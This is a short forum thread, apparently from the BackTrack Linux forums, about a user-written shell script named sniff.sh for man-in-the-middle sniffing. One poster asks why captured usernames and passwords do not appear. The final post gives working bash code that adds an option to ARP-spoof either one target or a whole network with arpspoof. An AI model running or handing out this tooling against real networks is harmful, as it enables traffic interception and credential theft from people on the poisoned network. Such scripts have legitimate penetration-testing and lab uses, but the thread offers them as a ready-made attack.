Re: Tool I wrote sniff.sh
Did you see my tool? http://www.backtrack-linux.org/forum...4x0r-tool.html it has this incorporated into it basically.. you can always add to it, if you do let me know so I can get it added, I'll add your name into it aswell.
Re: Tool I wrote sniff.sh
ascii art FTW. Now code it in python or perl :)
Re: Tool I wrote sniff.sh
From previous MITM attacks I have done the username/password appeared on the screen. Here I cannot trace it?
I even tried to check the ssl_log.txt and thats only the SSL certificate info. Am I missing something?
Re: Tool I wrote sniff.sh
Added option to ARP a Target or Network:
Replace #Arpsoof section with:
Code:
# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP
if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2
echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
else
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2
echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &
fi